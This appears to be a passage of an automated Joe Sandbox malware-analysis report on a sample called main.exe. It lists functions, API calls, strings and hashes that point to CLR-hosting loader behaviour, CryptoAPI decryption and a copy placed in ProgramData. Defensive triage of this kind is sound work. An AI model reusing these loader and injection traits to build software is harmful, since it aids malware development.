Instruction ID: cf7e0403a3daf9c88bd891ba868783979838df731c13441588134a25216a9163
Opcode Fuzzy Hash: a2b1ecdc0f05425fea013a1e5dd0813991ade05932349a66528fd68d6c6b561e
Instruction Fuzzy Hash: C1F08CB01042CCAEDF590F62C80DAEA3B99AB01744F088218FD44709E1CB74CA90AA10

Uniqueness

Uniqueness Score: -1.00%

Function 000F0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,000F1101,?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FEA
GetLastError.KERNEL32(?,?,000F117F,?,?,?,?,?,000F1169), ref: 000F0FF6

Part of subcall function 000E6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000F0FFF

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 72cdfdc761a6e198b93f17266d53eb36c379617353b59f22e6f829cf6d7d5348
Instruction ID: d0612ab230753b69e7619a85e287b84f5a750708f8c61c890ec8469146639061
Opcode Fuzzy Hash: 72cdfdc761a6e198b93f17266d53eb36c379617353b59f22e6f829cf6d7d5348
Instruction Fuzzy Hash: 92D02E32548130BBC6143324BE0ACFE3C049B32B71B308724F138706EACF220AC192A6

Uniqueness

Uniqueness Score: -1.00%

Function 000EE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,000EDA55,?), ref: 000EE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,000EDA55,?), ref: 000EE2B1

Strings

RTL, xrefs: 000EE2AB

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e8cefa781440bcbd44c1eb04ab3905077a9fe3f57fceec9a33149449e9210b69
Instruction ID: b334c83439d222cf82e329e0db736746e9d9c67d0bceeeef1f26c49ebb2417b4
Opcode Fuzzy Hash: e8cefa781440bcbd44c1eb04ab3905077a9fe3f57fceec9a33149449e9210b69
Instruction Fuzzy Hash: 0FC0123164075066E63417657D0DBC36E985B04B51F05049CB251FA5D5D6A5C5C086A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: main.exePID: 7748, Parent PID: 7688COMMON

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	4.8%
Signature Coverage:	0%
Total number of Nodes:	124
Total number of Limit Nodes:	5

Executed Functions

Function 00007FFDF7CA14B0 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDF7CA14D8
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDF7CA152D
__scrt_fastfail.LIBCMT ref: 00007FFDF7CA1549
_RTC_Initialize.LIBCMT ref: 00007FFDF7CA1561
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFDF7CA1583
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDF7CA159F
__scrt_release_startup_lock.LIBCMT ref: 00007FFDF7CA15CA
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFDF7CA15E9

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: 60ad72148b91878e3b16153315e761f2c720640e19d9d84f5d982d22fe093547
Instruction ID: eaca5539177abb081a8c643a413161becd85018e304948d09341fe3a94ce7e93
Opcode Fuzzy Hash: 60ad72148b91878e3b16153315e761f2c720640e19d9d84f5d982d22fe093547
Instruction Fuzzy Hash: 2F51792DF0C64387FB50AB65B471AFD22B1AF45B86F484036E92E4A2DEDE2DE5458300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CABDA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CABDCE
GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFDF7CA1898,?,?,?,?,00007FFDF7CA15A4), ref: 00007FFDF7CABDEF

Strings

C:\ProgramData\main.exe, xrefs: 00007FFDF7CABDDD

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: FileModuleName_invalid_parameter_noinfo
String ID: C:\ProgramData\main.exe
API String ID: 3307058713-2906359932
Opcode ID: 2dc5aa01033fe98f58406d78ba0122ad67fcd156f15ecddb341347428d3e1105
Instruction ID: f29cfec91523359977f5f92d6a65b66af49a299e597d9412b22878734755a3d0
Opcode Fuzzy Hash: 2dc5aa01033fe98f58406d78ba0122ad67fcd156f15ecddb341347428d3e1105
Instruction Fuzzy Hash: 4F419C3AF08B4286F7149F26A8708FC6794EB54B95B544032EA5E4BBC9DE3DE4918340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A1F8C Relevance: 1.6, APIs: 1, Instructions: 127libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00007FFD9B8A2044

Memory Dump Source

Source File: 00000005.00000002.1777501143.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_main.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 640a3fc4414044533d390303687f087550c8eb3afa2a5a6188330374c6d5d605
Instruction ID: 34e8b00b1d91ced1e1913211579ac9590779cd2663eeb0d20f39476f53ac1b76
Opcode Fuzzy Hash: 640a3fc4414044533d390303687f087550c8eb3afa2a5a6188330374c6d5d605
Instruction Fuzzy Hash: F931F53090CB4C4FDB2DEB989855AF97BE0EF5A321F04416FD05AD3692DB64A806C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A1ECD Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 00007FFD9B8A1F54

Memory Dump Source

Source File: 00000005.00000002.1777501143.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_main.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3da3e5ccfa57cc1e5b24f06fbb40acd147db6c57c1d5764d7023e5529652047b
Instruction ID: 4ab97ca6fa52f677c53039fdcd33f10feb62544a0e34549f65e335aa04168c25
Opcode Fuzzy Hash: 3da3e5ccfa57cc1e5b24f06fbb40acd147db6c57c1d5764d7023e5529652047b
Instruction Fuzzy Hash: 9921F130A0CA4C9FDB18DB98D849BE9BBE0FF59320F00426FD059D3652CB616816CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9E0287 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1779292235.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b9e0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6898c8251c7cd948f8b9e628918dcf71b1df1e4ca4ea3875f82d4ebb90e89f34
Instruction ID: 2850c9c367df5bba24848caa9d12ffae0d328ff57909199541618144df717a7e
Opcode Fuzzy Hash: 6898c8251c7cd948f8b9e628918dcf71b1df1e4ca4ea3875f82d4ebb90e89f34
Instruction Fuzzy Hash: CAE0862471FBC51FF7565378187A4AD2BF05F0A60075904F9D49ACB2F3D8091C068315

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFDF7CF1120 Relevance: 75.4, APIs: 20, Strings: 23, Instructions: 188libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF116F
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1188
GetProcAddress.KERNEL32 ref: 00007FFDF7CF1198
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF11DB
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF11ED
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF11FF
GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF1216
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1228
GetLastError.KERNEL32 ref: 00007FFDF7CF122E
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF13A3
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF142E

Strings

CorBindToRuntimeEx failure., xrefs: 00007FFDF7CF12E7
CLR creation not implemented., xrefs: 00007FFDF7CF129E
ICLRRuntimeInfo loadable failure., xrefs: 00007FFDF7CF1345
VerifyClrIsLoaded, xrefs: 00007FFDF7CF1408
could not get ICLRRuntimeInfo., xrefs: 00007FFDF7CF131D
ICLRRuntimeHost2 start success., xrefs: 00007FFDF7CF11C8
could not create ICLRMetaHost., xrefs: 00007FFDF7CF1285
GetCLRRuntimeHost, xrefs: 00007FFDF7CF118E
could not get ICLRRuntimeHost2., xrefs: 00007FFDF7CF11E6
ICLRRuntimeHost2 start failure., xrefs: 00007FFDF7CF11D4
missing CLR function., xrefs: 00007FFDF7CF1261
MSCorEE, xrefs: 00007FFDF7CF120F
ICLRRuntimeHost query success., xrefs: 00007FFDF7CF139C
ICLRRuntimeInfo not loadable., xrefs: 00007FFDF7CF135A
detected .NET Core in process., xrefs: 00007FFDF7CF1181
CorBindToRuntimeEx success., xrefs: 00007FFDF7CF12DB
eeeSdk1: %s HRESULT 0x%016X, xrefs: 00007FFDF7CF1413
could not get ICLRRuntimeHost., xrefs: 00007FFDF7CF138D
v4.0.30319, xrefs: 00007FFDF7CF130A
CoreCLR, xrefs: 00007FFDF7CF1152
CLRCreateInstance, xrefs: 00007FFDF7CF124C
missing CLR module in process., xrefs: 00007FFDF7CF1221
missing CoreCLR function., xrefs: 00007FFDF7CF11F8

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: DebugOutputString$HandleModule$AddressErrorLastProc
String ID: CLR creation not implemented.$CLRCreateInstance$CorBindToRuntimeEx failure.$CorBindToRuntimeEx success.$CoreCLR$GetCLRRuntimeHost$ICLRRuntimeHost query success.$ICLRRuntimeHost2 start failure.$ICLRRuntimeHost2 start success.$ICLRRuntimeInfo loadable failure.$ICLRRuntimeInfo not loadable.$MSCorEE$VerifyClrIsLoaded$could not create ICLRMetaHost.$could not get ICLRRuntimeHost.$could not get ICLRRuntimeHost2.$could not get ICLRRuntimeInfo.$detected .NET Core in process.$eeeSdk1: %s HRESULT 0x%016X$missing CLR function.$missing CLR module in process.$missing CoreCLR function.$v4.0.30319
API String ID: 1586866300-1257904583
Opcode ID: 4ec0c0398ac7ce2331cb7ed59b90b72d89657f33e81e4197c3f9a5aca80761e1
Instruction ID: d7a1b1b716ad42ce83f5b8d304836b1349bf0e25b93e086ba4c9b835b9a19a4f
Opcode Fuzzy Hash: 4ec0c0398ac7ce2331cb7ed59b90b72d89657f33e81e4197c3f9a5aca80761e1
Instruction Fuzzy Hash: 0DA1FC29B18A93D2EB10CB15F8609FD23A5FB94B44F900536D96E836E8EF7DE509C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CF0B50 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 231encryptionstringCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FFDF7CF0B85
GetEnvironmentVariableA.KERNEL32 ref: 00007FFDF7CF0BBE
lstrlenA.KERNEL32 ref: 00007FFDF7CF0BD0
CryptAcquireContextW.ADVAPI32 ref: 00007FFDF7CF0CA8
CryptCreateHash.ADVAPI32 ref: 00007FFDF7CF0CD0
CryptHashData.ADVAPI32 ref: 00007FFDF7CF0D3F
CryptDeriveKey.ADVAPI32 ref: 00007FFDF7CF0D69
CryptDecrypt.ADVAPI32 ref: 00007FFDF7CF0D9C
wsprintfA.USER32 ref: 00007FFDF7CF0DCF
GetEnvironmentVariableA.KERNEL32 ref: 00007FFDF7CF0E08
lstrlenA.KERNEL32 ref: 00007FFDF7CF0E17
lstrcatA.KERNEL32 ref: 00007FFDF7CF0E30
lstrcatA.KERNEL32 ref: 00007FFDF7CF0E42
lstrcmpA.KERNEL32 ref: 00007FFDF7CF0E53
CryptDestroyKey.ADVAPI32 ref: 00007FFDF7CF0E6B
CryptDestroyHash.ADVAPI32 ref: 00007FFDF7CF0E80
CryptReleaseContext.ADVAPI32 ref: 00007FFDF7CF0E97

Strings

HarpyTicketId, xrefs: 00007FFDF7CF0DDC
Harpy SDK v1.12 License Ticket for Process %lu, xrefs: 00007FFDF7CF0DC1
HarpyLicenseTicket, xrefs: 00007FFDF7CF0BB7
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00007FFDF7CF0C90

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: Crypt$Hash$ContextDestroyEnvironmentVariablelstrcatlstrlen$AcquireCreateCurrentDataDecryptDeriveProcessReleaselstrcmpwsprintf
String ID: Harpy SDK v1.12 License Ticket for Process %lu$HarpyLicenseTicket$HarpyTicketId$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 180405519-3523284812
Opcode ID: 59fd010b720426ec454b560ab24bcf33cd7d436fe01766645c68b9a388f43452
Instruction ID: 7f5bffd6fc206d9df0e45257cebda563eb7bfcb965d1c4ba058f1c27f2ac51c7
Opcode Fuzzy Hash: 59fd010b720426ec454b560ab24bcf33cd7d436fe01766645c68b9a388f43452
Instruction Fuzzy Hash: B791C336B18AC286EB20CF25E860BEE77A5FB84B44F454135DA9D83A98DF3DD545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB9020 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 171encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32 ref: 00007FFDF7CB9124
GetLastError.KERNEL32 ref: 00007FFDF7CB912E
CryptDestroyKey.ADVAPI32 ref: 00007FFDF7CB92B8
CryptDestroyHash.ADVAPI32 ref: 00007FFDF7CB92C8

Strings

missing encryption context, xrefs: 00007FFDF7CB9043
CryptDecrypt failed, code=%lu, xrefs: 00007FFDF7CB9261
CryptHashData failed, code=%lu, xrefs: 00007FFDF7CB918A
CryptDeriveKey failed, code=%lu, xrefs: 00007FFDF7CB91C0
CryptEncrypt failed, code=%lu, xrefs: 00007FFDF7CB923B
CryptCreateHash failed, code=%lu, xrefs: 00007FFDF7CB9134

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: Crypt$DestroyHash$CreateErrorLast
String ID: CryptCreateHash failed, code=%lu$CryptDecrypt failed, code=%lu$CryptDeriveKey failed, code=%lu$CryptEncrypt failed, code=%lu$CryptHashData failed, code=%lu$missing encryption context
API String ID: 527577405-1659892492
Opcode ID: f621d88533870f120e8a6cccc19ccf059e6a61c6b4015c72dd28b68b742656bd
Instruction ID: 28aeb8fd85f44945ffa7da21ad82830f45c1b59345bdf19e743d6bcc3f34dfa8
Opcode Fuzzy Hash: f621d88533870f120e8a6cccc19ccf059e6a61c6b4015c72dd28b68b742656bd
Instruction Fuzzy Hash: 49718029B08A82C5EB609B15A824AEE7360FB85BA4F504331EABE476D9DF3CD055C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAF2E8 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FFDF7CAF326

Part of subcall function 00007FFDF7CAEA6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEA80

_get_daylight.LIBCMT ref: 00007FFDF7CAF315

Part of subcall function 00007FFDF7CAEACC: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEAE0

_get_daylight.LIBCMT ref: 00007FFDF7CAF55B
_get_daylight.LIBCMT ref: 00007FFDF7CAF56C
_get_daylight.LIBCMT ref: 00007FFDF7CAF57D
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDF7CAF7DD), ref: 00007FFDF7CAF5A4
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF63A
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF686

Strings

:, xrefs: 00007FFDF7CAF41C
:, xrefs: 00007FFDF7CAF446
?, xrefs: 00007FFDF7CAF679
-, xrefs: 00007FFDF7CAF3EB

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
String ID: -$:$:$?
API String ID: 3440502458-92861585
Opcode ID: 4a925456571545faeec39bf93db72bcfde35aeeef74853eb9e954ebb019d3eb5
Instruction ID: 1530e5f81133d530b6b083d1ca55501ae8ff44ae067f88ac24781cfb5e5ad12a
Opcode Fuzzy Hash: 4a925456571545faeec39bf93db72bcfde35aeeef74853eb9e954ebb019d3eb5
Instruction Fuzzy Hash: CBE1C03AF0868286F7609F319871EED2B91FB84785F444135EA6E4AADDDF3CE8418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB8DC0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FFDF7CB8E57
GetLastError.KERNEL32 ref: 00007FFDF7CB8E61
CryptReleaseContext.ADVAPI32 ref: 00007FFDF7CB8E88
CryptReleaseContext.ADVAPI32 ref: 00007FFDF7CB8EA9
CryptReleaseContext.ADVAPI32 ref: 00007FFDF7CB8FA8

Strings

cryptoapi_encrypt, xrefs: 00007FFDF7CB8F45
CryptAcquireContext failed, code=%lu, xrefs: 00007FFDF7CB8E69
Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00007FFDF7CB8E42
cryptoapi_decrypt, xrefs: 00007FFDF7CB8EEC

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ContextCrypt$Release$AcquireErrorLast
String ID: CryptAcquireContext failed, code=%lu$Microsoft Enhanced Cryptographic Provider v1.0$cryptoapi_decrypt$cryptoapi_encrypt
API String ID: 972235000-3603160501
Opcode ID: d0c24ebadf50ff1acfba59b77752d8c21c86bee9cca92e9d2ac9f2c1c9361824
Instruction ID: 374dadf0ec25db2baa877e4db409862ca07e101cc8073bb05d8be021bd55abfb
Opcode Fuzzy Hash: d0c24ebadf50ff1acfba59b77752d8c21c86bee9cca92e9d2ac9f2c1c9361824
Instruction Fuzzy Hash: 2A515E3A708B8285E7608F25E8A0AE973A5FB84784F444134EA9D53BD9DF3CE4A5D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA44F0 Relevance: 9.2, APIs: 6, Instructions: 236COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA4512
_get_daylight.LIBCMT ref: 00007FFDF7CA456E
_get_daylight.LIBCMT ref: 00007FFDF7CA457F
_get_daylight.LIBCMT ref: 00007FFDF7CA4590
_isindst.LIBCMT ref: 00007FFDF7CA45E1
_isindst.LIBCMT ref: 00007FFDF7CA4634

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: b75992c2d31baf2fd2c7c1c732db52317cfa45f83435a5c5a64d9592f2474f38
Instruction ID: ea05203de62a4af93571aeb1d45048fb162a3c4e417bb7da6154eeca4143dff5
Opcode Fuzzy Hash: b75992c2d31baf2fd2c7c1c732db52317cfa45f83435a5c5a64d9592f2474f38
Instruction Fuzzy Hash: 2181AFB6F046468BFB589F29C971BED2691EB54789F448039DA1D8EACDEF3CE5008740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAD4C8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFDF7CAD541
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFDF7CAD559
RtlVirtualUnwind.KERNEL32 ref: 00007FFDF7CAD594
IsDebuggerPresent.KERNEL32 ref: 00007FFDF7CAD5CD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFDF7CAD5D7
UnhandledExceptionFilter.KERNEL32 ref: 00007FFDF7CAD5E2

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

